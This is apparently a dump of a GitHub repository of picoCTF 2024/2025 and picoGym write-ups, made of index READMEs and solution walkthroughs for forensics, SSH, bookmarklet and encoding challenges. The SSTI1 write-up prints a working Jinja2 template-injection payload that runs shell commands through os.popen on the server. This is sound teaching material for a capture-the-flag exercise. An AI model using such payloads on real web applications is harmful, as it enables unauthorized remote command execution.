codes](https://developer.mozilla.org/en-US/docs/Web/HTTP/Status) 55 | -------------------------------------------------------------------------------- /picoCTF_2024/Binary_Exploitation/README.md: -------------------------------------------------------------------------------- 1 | # Binary Exploitation Challenges 2 | 3 | ## Easy Binary Exploitation Challenges 4 | 5 | - [format string 0](format_string_0.md) 6 | - [format string 1](format_string_1.md) 7 | - [heap 0](heap_0.md) 8 | - [heap 1](heap_1.md) 9 | 10 | ## Medium Binary Exploitation Challenges 11 | 12 | - [format string 2](format_string_2.md) 13 | - [heap 2](heap_2.md) 14 | -------------------------------------------------------------------------------- /picoCTF_2024/Cryptography/README.md: -------------------------------------------------------------------------------- 1 | # Cryptography Challenges 2 | 3 | ## Easy Cryptography Challenges 4 | 5 | - [Custom encryption](Custom_encryption.md) 6 | - [interencdec](interencdec.md) 7 | 8 | ## Medium Cryptography Challenges 9 | 10 | - [C3](C3.md) 11 | -------------------------------------------------------------------------------- /picoCTF_2024/Forensics/Mob_psycho.md: -------------------------------------------------------------------------------- 1 | # Mob psycho 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | 9 | ```text 10 | Level: Medium 11 | Tags: picoCTF 2024, Forensics, browser_webshell_solvable, apk 12 | Author: NGIRIMANA SCHADRACK 13 | 14 | Description: 15 | Can you handle APKs? 16 | 17 | Download the android apk here. 18 | 19 | Hints: 20 | 1. Did you know you can unzip APK files? 21 | 2. Now you have the whole host of shell tools for searching these files. 22 | ``` 23 | 24 | Challenge link: [https://play.picoctf.org/practice/challenge/420](https://play.picoctf.org/practice/challenge/420) 25 | 26 | ## Solution 27 | 28 | ### Unpacking and basic analysis 29 | 30 | We start by unpacking the [apk-file](https://en.wikipedia.org/wiki/Apk_(file_format)) with `unzip` 31 | 32 | ```bash 33 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2024/Forensics/Mob_psycho] 34 | └─$ unzip mobpsycho.apk 35 | Archive: mobpsycho.apk 36 | creating: res/ 37 | creating: res/anim/ 38 | inflating: res/anim/abc_fade_in.xml 39 | inflating: res/anim/abc_fade_out.xml 40 | inflating: res/anim/abc_grow_fade_in_from_bottom.xml 41 | inflating: res/anim/abc_popup_enter.xml 42 | inflating: res/anim/abc_popup_exit.xml 43 | <---snip---> 44 | ``` 45 | 46 | Let's be optimistic and `grep` for the flag 47 | 48 | ```bash 49 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2024/Forensics/Mob_psycho] 50 | └─$ grep -iR picoCTF * 51 | 52 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2024/Forensics/Mob_psycho] 53 | └─$ strings mobpsycho.apk | grep flag 54 | res/color/flag.txtUT 55 | res/color/flag.txtUT 56 | 57 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2024/Forensics/Mob_psycho] 58 | └─$ cat res/color/flag.txt 59 | 7069636f4354467b6178386d433052553676655f4e5838356c346178386d436c5f61336562356163327d 60 | ``` 61 | 62 | This looks like hex-encoding. 63 | 64 | ### Get the flag 65 | 66 | Decode with `xxd` like this 67 | 68 | ```bash 69 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2024/Forensics/Mob_psycho] 70 | └─$ cat res/color/flag.txt | xxd -r -p 71 | picoCTF{} 72 | ``` 73 | 74 | For additional information, please see the references below. 75 | 76 | ## References 77 | 78 | - [apk (file format) - Wikipedia](https://en.wikipedia.org/wiki/Apk_(file_format)) 79 | - [grep - Linux manual page](https://man7.org/linux/man-pages/man1/grep.1.html) 80 | - [strings - Linux manual page](https://man7.org/linux/man-pages/man1/strings.1.html) 81 | - [unzip - Linux manual page](https://linux.die.net/man/1/unzip) 82 | - [xxd - Linux manual page](https://linux.die.net/man/1/xxd) 83 | -------------------------------------------------------------------------------- /picoCTF_2024/Forensics/README.md: -------------------------------------------------------------------------------- 1 | # Forensics Challenges 2 | 3 | ## Easy Forensics Challenges 4 | 5 | - [CanYouSee](CanYouSee.md) 6 | - [Scan Surprise](Scan_Surprise.md) 7 | - [Secret of the Polyglot](Secret_of_the_Polyglot.md) 8 | - [Verify](Verify.md) 9 | 10 | ## Medium Forensics Challenges 11 | 12 | - [Blast from the past](Blast_from_the_past.md) 13 | - [Mob psycho](Mob_psycho.md) 14 | -------------------------------------------------------------------------------- /picoCTF_2024/Forensics/Scan_Surprise.md: -------------------------------------------------------------------------------- 1 | # Scan Surprise 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | 9 | ```text 10 | Level: Easy 11 | Tags: picoCTF 2024, Forensics, shell, browser_webshell_solvable, qr_code 12 | Author: JEFFERY JOHN 13 | 14 | Description: 15 | I've gotten bored of handing out flags as text. Wouldn't it be cool if they were an image instead? 16 | 17 | You can download the challenge files here: 18 | challenge.zip 19 | 20 | The same files are accessible via SSH here: 21 | ssh -p 61129 ctf-player@atlas.picoctf.net 22 | Using the password 83dcefb7. Accept the fingerprint with yes, and ls once connected to begin. 23 | Remember, in a shell, passwords are hidden! 24 | 25 | Hints: 26 | 1. QR codes are a way of encoding data. While they're most known for storing URLs, 27 | they can store other things too. 28 | 2. Mobile phones have included native QR code scanners in their cameras since version 8 (Oreo) and iOS 11 29 | 3. If you don't have access to a phone, you can also use zbar-tools to convert an image to text 30 | ``` 31 | 32 | Challenge link: [https://play.picoctf.org/practice/challenge/444](https://play.picoctf.org/practice/challenge/444) 33 | 34 | ## Solution 35 | 36 | ### Unpacking and basic analysis 37 | 38 | We start by unpacking the zip-file 39 | 40 | ```bash 41 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2024/Forensics/Scan_Surprise] 42 | └─$ unzip challenge.zip 43 | Archive: challenge.zip 44 | creating: home/ctf-player/drop-in/ 45 | extracting: home/ctf-player/drop-in/flag.png 46 | 47 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2024/Forensics/Scan_Surprise] 48 | └─$ cd home/ctf-player/drop-in 49 | 50 | ┌──(kali㉿kali)-[/mnt/…/Scan_Surprise/home/ctf-player/drop-in] 51 | └─$ file flag.png 52 | flag.png: PNG image data, 99 x 99, 1-bit colormap, non-interlaced 53 | ``` 54 | 55 | We have a [PNG-file](https://en.wikipedia.org/wiki/PNG) which is a [QR-code](https://en.wikipedia.org/wiki/QR_code). 56 | Use a tool such as `eog` of `feh` to view it on Linux. 57 | 58 | ### Get the flag 59 | 60 | To get the flag we can use the `zbar-tools` package as described in one of the hints. 61 | Use `sudo apt install zbar-tools` to install it if needed. 62 | 63 | ```bash 64 | ┌──(kali㉿kali)-[/mnt/…/Scan_Surprise/home/ctf-player/drop-in] 65 | └─$ zbarimg flag.png 66 | QR-Code:picoCTF{} 67 | scanned 1 barcode symbols from 1 images in 0.01 seconds 68 | ``` 69 | 70 | For additional information, please see the references below. 71 | 72 | ## References 73 | 74 | - [PNG - Wikipedia](https://en.wikipedia.org/wiki/PNG) 75 | - [QR code - Wikipedia](https://en.wikipedia.org/wiki/QR_code) 76 | -------------------------------------------------------------------------------- /picoCTF_2024/General_Skills/README.md: -------------------------------------------------------------------------------- 1 | # General Skills Challenges 2 | 3 | ## Easy General Skills Challenges 4 | 5 | - [Binary Search](Binary_Search.md) 6 | - [binhexa](binhexa.md) 7 | - [Blame Game](Blame_Game.md) 8 | - [Collaborative Development](Collaborative_Development.md) 9 | - [Commitment Issues](Commitment_Issues.md) 10 | - [endianness](endianness.md) 11 | - [Super SSH](Super_SSH.md) 12 | - [Time Machine](Time_Machine.md) 13 | 14 | ## Medium General Skills Challenges 15 | 16 | - [dont-you-love-banners](dont-you-love-banners.md) 17 | - [SansAlpha](SansAlpha.md) 18 | -------------------------------------------------------------------------------- /picoCTF_2024/General_Skills/Super_SSH.md: -------------------------------------------------------------------------------- 1 | # Super SSH 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | 9 | ```text 10 | Level: Easy 11 | Tags: picoCTF 2024, General Skills, shell, ssh, browser_webshell_solvable 12 | Author: JEFFERY JOHN 13 | 14 | Description: 15 | Using a Secure Shell (SSH) is going to be pretty important. 16 | Can you ssh as ctf-player to titan.picoctf.net at port 64614 to get the flag? 17 | 18 | You'll also need the password 1ad5be0d. If asked, accept the fingerprint with yes. 19 | 20 | If your device doesn't have a shell, you can use: https://webshell.picoctf.org 21 | If you're not sure what a shell is, check out our Primer: https://primer.picoctf.com/#_the_shell 22 | 23 | Hints: 24 | 1. https://linux.die.net/man/1/ssh 25 | 2. You can try logging in 'as' someone with @titan.picoctf.net 26 | 3. How could you specify the port? 27 | 4. Remember, passwords are hidden when typed into the shell 28 | ``` 29 | 30 | Challenge link: [https://play.picoctf.org/practice/challenge/424](https://play.picoctf.org/practice/challenge/424) 31 | 32 | ## Solution 33 | 34 | We connect with SSH like this: 35 | 36 | ```bash 37 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2024/General_Skills/Super_SSH] 38 | └─$ ssh -p 50400 ctf-player@titan.picoctf.net 39 | The authenticity of host '[titan.picoctf.net]:50400 ([3.139.174.234]:50400)' can't be established. 40 | ED25519 key fingerprint is SHA256:4S9EbTSSRZm32I+cdM5TyzthpQryv5kudRP9PIKT7XQ. 41 | This host key is known by the following other names/addresses: 42 | ~/.ssh/known_hosts:94: [hashed name] 43 | ~/.ssh/known_hosts:95: [hashed name] 44 | Are you sure you want to continue connecting (yes/no/[fingerprint])? yes 45 | Warning: Permanently added '[titan.picoctf.net]:50400' (ED25519) to the list of known hosts. 46 | ctf-player@titan.picoctf.net's password: 47 | Welcome ctf-player, here's your flag: picoCTF{} 48 | Connection to titan.picoctf.net closed. 49 | ``` 50 | 51 | And there we have the flag. 52 | 53 | For additional information, please see the references below. 54 | 55 | ## References 56 | 57 | - [Secure Shell - Wikipedia](https://en.wikipedia.org/wiki/Secure_Shell) 58 | - [ssh - Linux manual page](https://man7.org/linux/man-pages/man1/ssh.1.html) 59 | -------------------------------------------------------------------------------- /picoCTF_2024/README.md: -------------------------------------------------------------------------------- 1 | # picoCTF 2024 Challenges 2 | 3 | ## Binary Exploitation Challenges 4 | 5 | ### Easy Binary Exploitation Challenges 6 | 7 | - [format string 0](Binary_Exploitation/format_string_0.md) 8 | - [format string 1](Binary_Exploitation/format_string_1.md) 9 | - [heap 0](Binary_Exploitation/heap_0.md) 10 | - [heap 1](Binary_Exploitation/heap_1.md) 11 | 12 | ### Medium Binary Exploitation Challenges 13 | 14 | - [format string 2](Binary_Exploitation/format_string_2.md) 15 | - [heap 2](Binary_Exploitation/heap_2.md) 16 | 17 | ## Cryptography Challenges 18 | 19 | ### Easy Cryptography Challenges 20 | 21 | - [Custom encryption](Cryptography/Custom_encryption.md) 22 | - [interencdec](Cryptography/interencdec.md) 23 | 24 | ### Medium Cryptography Challenges 25 | 26 | - [C3](Cryptography/C3.md) 27 | 28 | ## Forensics Challenges 29 | 30 | ### Easy Forensics Challenges 31 | 32 | - [CanYouSee](Forensics/CanYouSee.md) 33 | - [Scan Surprise](Forensics/Scan_Surprise.md) 34 | - [Secret of the Polyglot](Forensics/Secret_of_the_Polyglot.md) 35 | - [Verify](Forensics/Verify.md) 36 | 37 | ### Medium Forensics Challenges 38 | 39 | - [Blast from the past](Forensics/Blast_from_the_past.md) 40 | - [Mob psycho](Forensics/Mob_psycho.md) 41 | 42 | ## General Skills Challenges 43 | 44 | ### Easy General Skills Challenges 45 | 46 | - [Binary Search](General_Skills/Binary_Search.md) 47 | - [binhexa](General_Skills/binhexa.md) 48 | - [Blame Game](General_Skills/Blame_Game.md) 49 | - [Collaborative Development](General_Skills/Collaborative_Development.md) 50 | - [Commitment Issues](General_Skills/Commitment_Issues.md) 51 | - [endianness](General_Skills/endianness.md) 52 | - [Super SSH](General_Skills/Super_SSH.md) 53 | - [Time Machine](General_Skills/Time_Machine.md) 54 | 55 | ### Medium General Skills Challenges 56 | 57 | - [dont-you-love-banners](General_Skills/dont-you-love-banners.md) 58 | - [SansAlpha](General_Skills/SansAlpha.md) 59 | 60 | ## Reverse Engineering Challenges 61 | 62 | ### Easy Reverse Engineering Challenges 63 | 64 | - [packer](Reverse_Engineering/packer.md) 65 | 66 | ### Medium Reverse Engineering Challenges 67 | 68 | - [FactCheck](Reverse_Engineering/FactCheck.md) 69 | 70 | ## Web Exploitation Challenges 71 | 72 | ### Easy Web Exploitation Challenges 73 | 74 | - [Bookmarklet](Web_Exploitation/Bookmarklet.md) 75 | - [IntroToBurp](Web_Exploitation/IntroToBurp.md) 76 | - [Unminify](Web_Exploitation/Unminify.md) 77 | - [WebDecode](Web_Exploitation/WebDecode.md) 78 | 79 | ### Medium Web Exploitation Challenges 80 | 81 | - [Trickster](Web_Exploitation/Trickster.md) 82 | -------------------------------------------------------------------------------- /picoCTF_2024/Reverse_Engineering/README.md: -------------------------------------------------------------------------------- 1 | # Reverse Engineering Challenges 2 | 3 | ## Easy Reverse Engineering Challenges 4 | 5 | - [packer](packer.md) 6 | 7 | ## Medium Reverse Engineering Challenges 8 | 9 | - [FactCheck](FactCheck.md) 10 | -------------------------------------------------------------------------------- /picoCTF_2024/Web_Exploitation/Bookmarklet.md: -------------------------------------------------------------------------------- 1 | # Bookmarklet 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | 9 | ```text 10 | Level: Easy 11 | Tags: picoCTF 2024, Web Exploitation, obfuscation, browser_webshell_solvable, browser 12 | Author: JEFFERY JOHN 13 | 14 | Description: 15 | Why search for the flag when I can make a bookmarklet to print it for me? 16 | 17 | Browse here, and find the flag! 18 | 19 | Hints: 20 | 1. A bookmarklet is a bookmark that runs JavaScript instead of loading a webpage. 21 | 2. What happens when you click a bookmarklet? 22 | 3. Web browsers have other ways to run JavaScript too. 23 | ``` 24 | 25 | Challenge link: [https://play.picoctf.org/practice/challenge/406](https://play.picoctf.org/practice/challenge/406) 26 | 27 | ## Solution 28 | 29 | Browse to the web site and you will see a web page like this: 30 | 31 | ![Bookmerklet web site](Images/Bookmarklet_Web_Site.png) 32 | 33 | The text box contains the following JavaScript: 34 | 35 | ```javascript 36 | javascript:(function() { 37 | var encryptedFlag = "àÒÆÞ¦È¬ë٣֖ÓÚåÛÑ¢ÕӖәǡ”¥Ìí"; 38 | var key = "picoctf"; 39 | var decryptedFlag = ""; 40 | for (var i = 0; i < encryptedFlag.length; i++) { 41 | decryptedFlag += String.fromCharCode((encryptedFlag.charCodeAt(i) - key.charCodeAt(i % key.length) + 256) % 256); 42 | } 43 | alert(decryptedFlag); 44 | })(); 45 | ``` 46 | 47 | You can decode this by running the code in the browser's DevTools. Press `F12` or `Ctrl + Shift + I` to activate the developer tools. 48 | Select the `Console` tab and type `allow pasting` followed by the main part of the code. 49 | I generally prefer to enter the code line-by-line for better understanding: 50 | 51 | ```text 52 | allow pasting 53 | > var encryptedFlag = "àÒÆÞ¦È¬ëÙ£Ö�ÓÚåÛÑ¢ÕÓ�Ó�Ç¡�¥Ìí"; 54 | undefined 55 | > var key = "picoctf"; 56 | undefined 57 | > var decryptedFlag = ""; 58 | undefined 59 | > for (var i = 0; i < encryptedFlag.length; i++) { 60 | decryptedFlag += String.fromCharCode((encryptedFlag.charCodeAt(i) - key.charCodeAt(i % key.length) + 256) % 256); 61 | } 62 | 'picoCTF{}' 63 | ``` 64 | 65 | And there we have the flag. 66 | 67 | For additional information, please see the references below. 68 | 69 | ## References 70 | 71 | - [Bookmarklet - Wikipedia](https://en.wikipedia.org/wiki/Bookmarklet) 72 | - [JavaScript - Wikipedia](https://en.wikipedia.org/wiki/JavaScript) 73 | -------------------------------------------------------------------------------- /picoCTF_2024/Web_Exploitation/Images/Bookmarklet_Web_Site.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cajac/picoCTF-Writeups/9c46923d83fc95b5aa66e7e41df3b163bc512fee/picoCTF_2024/Web_Exploitation/Images/Bookmarklet_Web_Site.png -------------------------------------------------------------------------------- /picoCTF_2024/Web_Exploitation/README.md: -------------------------------------------------------------------------------- 1 | # Web Exploitation Challenges 2 | 3 | ## Easy Web Exploitation Challenges 4 | 5 | - [Bookmarklet](Bookmarklet.md) 6 | - [IntroToBurp](IntroToBurp.md) 7 | - [Unminify](Unminify.md) 8 | - [WebDecode](WebDecode.md) 9 | 10 | ## Medium Web Exploitation Challenges 11 | 12 | - [Trickster](Trickster.md) 13 | -------------------------------------------------------------------------------- /picoCTF_2025/Binary_Exploitation/README.md: -------------------------------------------------------------------------------- 1 | # Binary Exploitation Challenges 2 | 3 | ## Easy Binary Exploitation Challenges 4 | 5 | - [PIE TIME](PIE_TIME.md) 6 | -------------------------------------------------------------------------------- /picoCTF_2025/Cryptography/README.md: -------------------------------------------------------------------------------- 1 | # Cryptography Challenges 2 | 3 | ## Easy Cryptography Challenges 4 | 5 | - [EVEN RSA CAN BE BROKEN???](EVEN_RSA_CAN_BE_BROKEN.md) 6 | - [hashcrack](hashcrack.md) 7 | -------------------------------------------------------------------------------- /picoCTF_2025/Forensics/Images/Info_encoded_in_RED.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cajac/picoCTF-Writeups/9c46923d83fc95b5aa66e7e41df3b163bc512fee/picoCTF_2025/Forensics/Images/Info_encoded_in_RED.png -------------------------------------------------------------------------------- /picoCTF_2025/Forensics/README.md: -------------------------------------------------------------------------------- 1 | # Forensics Challenges 2 | 3 | ## Easy Forensics Challenges 4 | 5 | - [Ph4nt0m 1ntrud3r](Ph4nt0m_1ntrud3r.md) 6 | - [RED](RED.md) 7 | -------------------------------------------------------------------------------- /picoCTF_2025/General_Skills/README.md: -------------------------------------------------------------------------------- 1 | # General Skills Challenges 2 | 3 | ## Easy General Skills Challenges 4 | 5 | - [FANTASY CTF](FANTASY_CTF.md) 6 | - [Rust fixme 1](Rust_fixme_1.md) 7 | - [Rust fixme 2](Rust_fixme_2.md) 8 | - [Rust fixme 3](Rust_fixme_3.md) 9 | -------------------------------------------------------------------------------- /picoCTF_2025/README.md: -------------------------------------------------------------------------------- 1 | # picoCTF 2025 Challenges 2 | 3 | ## Binary Exploitation Challenges 4 | 5 | ### Easy Binary Exploitation Challenges 6 | 7 | - [PIE TIME](Binary_Exploitation/PIE_TIME.md) 8 | 9 | ## Cryptography Challenges 10 | 11 | ### Easy Cryptography Challenges 12 | 13 | - [EVEN RSA CAN BE BROKEN???](Cryptography/EVEN_RSA_CAN_BE_BROKEN.md) 14 | - [hashcrack](Cryptography/hashcrack.md) 15 | 16 | ## Forensics Challenges 17 | 18 | ### Easy Forensics Challenges 19 | 20 | - [Ph4nt0m 1ntrud3r](Forensics/Ph4nt0m_1ntrud3r.md) 21 | - [RED](Forensics/RED.md) 22 | 23 | ## General Skills Challenges 24 | 25 | ### Easy General Skills Challenges 26 | 27 | - [FANTASY CTF](General_Skills/FANTASY_CTF.md) 28 | - [Rust fixme 1](General_Skills/Rust_fixme_1.md) 29 | - [Rust fixme 2](General_Skills/Rust_fixme_2.md) 30 | - [Rust fixme 3](General_Skills/Rust_fixme_3.md) 31 | 32 | ## Reverse Engineering Challenges 33 | 34 | ### Easy Reverse Engineering Challenges 35 | 36 | - [Flag Hunters](Reverse_Engineering/Flag_Hunters.md) 37 | 38 | ## Web Exploitation Challenges 39 | 40 | ### Easy Web Exploitation Challenges 41 | 42 | - [Cookie Monster Secret Recipe](Web_Exploitation/Cookie_Monster_Secret_Recipe.md) 43 | - [head-dump](Web_Exploitation/head-dump.md) 44 | - [n0s4n1ty 1](Web_Exploitation/n0s4n1ty_1.md) 45 | - [Pachinko](Web_Exploitation/Pachinko.md) 46 | - [SSTI1](Web_Exploitation/SSTI1.md) 47 | -------------------------------------------------------------------------------- /picoCTF_2025/Reverse_Engineering/README.md: -------------------------------------------------------------------------------- 1 | # Reverse Engineering Challenges 2 | 3 | ## Easy Reverse Engineering Challenges 4 | 5 | - [Flag Hunters](Flag_Hunters.md) 6 | -------------------------------------------------------------------------------- /picoCTF_2025/Web_Exploitation/Images/Cookie_Monster.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cajac/picoCTF-Writeups/9c46923d83fc95b5aa66e7e41df3b163bc512fee/picoCTF_2025/Web_Exploitation/Images/Cookie_Monster.png -------------------------------------------------------------------------------- /picoCTF_2025/Web_Exploitation/Images/Heapdump_endpoint_info.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cajac/picoCTF-Writeups/9c46923d83fc95b5aa66e7e41df3b163bc512fee/picoCTF_2025/Web_Exploitation/Images/Heapdump_endpoint_info.png -------------------------------------------------------------------------------- /picoCTF_2025/Web_Exploitation/Images/NoSanity_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cajac/picoCTF-Writeups/9c46923d83fc95b5aa66e7e41df3b163bc512fee/picoCTF_2025/Web_Exploitation/Images/NoSanity_1.png -------------------------------------------------------------------------------- /picoCTF_2025/Web_Exploitation/Images/Pachinko_NAND_Simulator.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cajac/picoCTF-Writeups/9c46923d83fc95b5aa66e7e41df3b163bc512fee/picoCTF_2025/Web_Exploitation/Images/Pachinko_NAND_Simulator.png -------------------------------------------------------------------------------- /picoCTF_2025/Web_Exploitation/Images/SSTI_Decision_Tree.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cajac/picoCTF-Writeups/9c46923d83fc95b5aa66e7e41df3b163bc512fee/picoCTF_2025/Web_Exploitation/Images/SSTI_Decision_Tree.png -------------------------------------------------------------------------------- /picoCTF_2025/Web_Exploitation/Images/head-dump.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cajac/picoCTF-Writeups/9c46923d83fc95b5aa66e7e41df3b163bc512fee/picoCTF_2025/Web_Exploitation/Images/head-dump.png -------------------------------------------------------------------------------- /picoCTF_2025/Web_Exploitation/README.md: -------------------------------------------------------------------------------- 1 | # Web Exploitation Challenges 2 | 3 | ## Easy Web Exploitation Challenges 4 | 5 | - [Cookie Monster Secret Recipe](Cookie_Monster_Secret_Recipe.md) 6 | - [head-dump](head-dump.md) 7 | - [n0s4n1ty 1](n0s4n1ty_1.md) 8 | - [Pachinko](Pachinko.md) 9 | - [SSTI1](SSTI1.md) 10 | -------------------------------------------------------------------------------- /picoCTF_2025/Web_Exploitation/SSTI1.md: -------------------------------------------------------------------------------- 1 | # SSTI1 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | 9 | ```text 10 | Level: Easy 11 | Tags: Web Exploitation, picoCTF 2025, browser_webshell_solvable 12 | Author: VENAX 13 | 14 | Description: 15 | I made a cool website where you can announce whatever you want! 16 | Try it out! 17 | I heard templating is a cool and modular way to build web apps! 18 | Check out my website here! 19 | 20 | Hints: 21 | 1. Server Side Template Injection 22 | ``` 23 | 24 | Challenge link: [https://play.picoctf.org/practice/challenge/492](https://play.picoctf.org/practice/challenge/492) 25 | 26 | ## Solution 27 | 28 | Browse to the web site and you will see a web page that includes the text 29 | 30 | ```text 31 | Home 32 | I built a cool website that lets you announce whatever you want!* 33 | 34 | What do you want to announce: 35 | ``` 36 | 37 | followed by an input text box and an `OK`-button. 38 | 39 | ### Verify SSTI 40 | 41 | The hint has already given away that the site uses [server-side templates](https://portswigger.net/web-security/server-side-template-injection) but we need to verify that and find out the backend technology used. 42 | 43 | To our help we use the following decision tree from [PortSwiggers page on Server-side template injection](https://portswigger.net/web-security/server-side-template-injection) 44 | 45 | ![SSTI Decision Tree](Images/SSTI_Decision_Tree.png) 46 | 47 | The tests done are as follows: 48 | 49 | 1. Entering `${7*7}` yields `${7*7}`, 50 | 2. Entering `{{7*7}}` yields `49` and 51 | 3. `{{7*'7'}}` yields `7777777` 52 | 53 | So now we know we have a Jinja2 backend. 54 | 55 | Googling around for SSTI Jinja2-payloads I found this one: `{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}` 56 | 57 | ### Look for the flag 58 | 59 | Using the payload `{{request.application.__globals__.__builtins__.__import__('os').popen('ls -l').read()}}` we get the following result 60 | 61 | ```html 62 | 63 |

total 12 64 | drwxr-xr-x 2 root root 32 Apr 12 10:09 __pycache__ 65 | -rwxr-xr-x 1 root root 1241 Mar 6 03:27 app.py 66 | -rw-r--r-- 1 root root 58 Mar 6 19:44 flag 67 | -rwxr-xr-x 1 root root 268 Mar 6 03:27 requirements.txt 68 |

69 | ``` 70 | 71 | So now we have the name and location of the flag 72 | 73 | ### Get the flag 74 | 75 | We get the flag with the payload `{{request.application.__globals__.__builtins__.__import__('os').popen('cat flag').read()}}` 76 | 77 | For additional information, please see the references below. 78 | 79 | ## References 80 | 81 | - [Flask (web framework) - Wikipedia](https://en.wikipedia.org/wiki/Flask_(web_framework)) 82 | - [Jinja (template engine) - Wikipedia](https://en.wikipedia.org/wiki/Jinja_(template_engine)) 83 | - [Server-side template injection - PortSwigger](https://portswigger.net/web-security/server-side-template-injection) 84 | -------------------------------------------------------------------------------- /picoGym_Exclusive/Binary_Exploitation/README.md: -------------------------------------------------------------------------------- 1 | # Binary Exploitation Challenges 2 | 3 | 1 Challenge: 4 | - [Local Target](Local_Target.md) 5 | -------------------------------------------------------------------------------- /picoGym_Exclusive/Forensics/Name_of_SSID_Field_in_Wireshark.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cajac/picoCTF-Writeups/9c46923d83fc95b5aa66e7e41df3b163bc512fee/picoGym_Exclusive/Forensics/Name_of_SSID_Field_in_Wireshark.png -------------------------------------------------------------------------------- /picoGym_Exclusive/Forensics/README.md: -------------------------------------------------------------------------------- 1 | # Forensics Challenges 2 | 3 | 1 Challenge: 4 | - [WPA-ing Out](WPA-ing_Out.md) 5 | -------------------------------------------------------------------------------- /picoGym_Exclusive/General_Skills/ASCII_Numbers.md: -------------------------------------------------------------------------------- 1 | # ASCII Numbers 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | ``` 9 | Points: 100 10 | Tags: picoGym Exclusive, General Skills 11 | Author: LT 'SYREAL' JONES 12 | 13 | Description: 14 | Convert the following string of ASCII numbers into a readable string: 15 | 0x70 0x69 0x63 0x6f 0x43 0x54 0x46 0x7b 0x34 0x35 0x63 0x31 0x31 0x5f 0x6e 0x30 0x5f 0x71 0x75 0x33 0x35 0x37 0x31 0x30 0x6e 0x35 0x5f 0x31 0x6c 0x6c 0x5f 0x74 0x33 0x31 0x31 0x5f 0x79 0x33 0x5f 0x6e 0x30 0x5f 0x6c 0x31 0x33 0x35 0x5f 0x34 0x34 0x35 0x64 0x34 0x31 0x38 0x30 0x7d 16 | 17 | Hints: 18 | 1. CyberChef is a great tool for any encoding but especially ASCII. 19 | 2. Try CyberChef's 'From Hex' function 20 | ``` 21 | Challenge link: [https://play.picoctf.org/practice/challenge/390](https://play.picoctf.org/practice/challenge/390) 22 | 23 | ## Solution 24 | 25 | This challenge can easily be solved with [CyberChef's 'From Hex' recipe](https://gchq.github.io/CyberChef/#recipe=From_Hex('Auto')) but that's no fun. 26 | 27 | Let's write a python script called `solve.py` instead. The script uses both [lambda](https://docs.python.org/3/reference/expressions.html#lambda) and [map](https://docs.python.org/3/library/functions.html#map) functions. 28 | ```python 29 | #!/usr/bin/python 30 | 31 | # Create an array of the hex string numbers 32 | enc_flag_array = "0x70 0x69 0x63 0x6f 0x43 0x54 0x46 0x7b 0x34 0x35 0x63 0x31 0x31 0x5f 0x6e 0x30 0x5f 0x71 0x75 0x33 0x35 0x37 0x31 0x30 0x6e 0x35 0x5f 0x31 0x6c 0x6c 0x5f 0x74 0x33 0x31 0x31 0x5f 0x79 0x33 0x5f 0x6e 0x30 0x5f 0x6c 0x31 0x33 0x35 0x5f 0x34 0x34 0x35 0x64 0x34 0x31 0x38 0x30 0x7d".split() 33 | 34 | # Convert to numbers 35 | num_array = map(lambda x: int(x, 16), enc_flag_array) 36 | 37 | # Convert to chars 38 | char_array = map(chr, num_array) 39 | 40 | # Print the flag 41 | print(''.join(char_array)) 42 | ``` 43 | 44 | Then run the script to get the flag 45 | ``` 46 | ┌──(kali㉿kali)-[/picoCTF/picoGym/General_Skills/ASCII_Numbers] 47 | └─$ python solve.py 48 | picoCTF{} 49 | ``` 50 | 51 | For additional information, please see the references below. 52 | 53 | ## References 54 | 55 | - [ASCII Table](https://www.asciitable.com/) 56 | - [chr function - Python](https://docs.python.org/3/library/functions.html#chr) 57 | - [CyberChef - Home page](https://gchq.github.io/CyberChef/) 58 | - [lambda expression - Python](https://docs.python.org/3/reference/expressions.html#lambda) 59 | - [map function - Python](https://docs.python.org/3/library/functions.html#map) 60 | - [Wikipedia - ASCII](https://en.wikipedia.org/wiki/ASCII) 61 | -------------------------------------------------------------------------------- /picoGym_Exclusive/General_Skills/Big_Zip.md: -------------------------------------------------------------------------------- 1 | # Big Zip 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | ``` 9 | Points: 100 10 | Tags: picoGym Exclusive, General Skills 11 | Author: LT 'SYREAL' JONES 12 | 13 | Description: 14 | Unzip this archive and find the flag. 15 | 16 | Hints: 17 | 1. Can grep be instructed to look at every file in a directory and its subdirectories? 18 | ``` 19 | Challenge link: [https://play.picoctf.org/practice/challenge/322](https://play.picoctf.org/practice/challenge/322) 20 | 21 | ## Solution 22 | 23 | Unzip the file 24 | ``` 25 | ┌──(kali㉿kali)-[/picoCTF/picoGym/General_Skills/Big_Zip] 26 | └─$ unzip 